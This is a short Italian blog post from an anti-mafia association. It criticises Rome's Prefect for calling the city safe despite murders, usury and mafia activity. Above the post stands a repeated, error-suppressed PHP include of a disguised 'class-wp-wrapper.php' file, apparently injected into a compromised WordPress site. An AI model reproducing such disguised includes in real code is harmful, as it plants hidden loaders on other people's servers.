@include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); @include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); Il Times definisce Roma la città più pericolosa d’Europa ed infatti nella Capitale ci sono state decine di omicidi, senza considerare il fenomeno dell’usura, delle mafie e dei reati connessi, con un giro di affari illeciti incalcolabile. Eppure questo Prefetto definì la Capitale la… città più… sicura d’Italia. Ma la vogliamo finire o no di negare l’evidenza… mettendosi a lavorare per dare un minimo di sicurezza e di vivibilità ai cittadini perbene???! Che aspetta il Ministro Cancellieri a rimuovere questo Prefetto??? – Antonino Caponnetto ODV

Ti potrebbe anche interessare...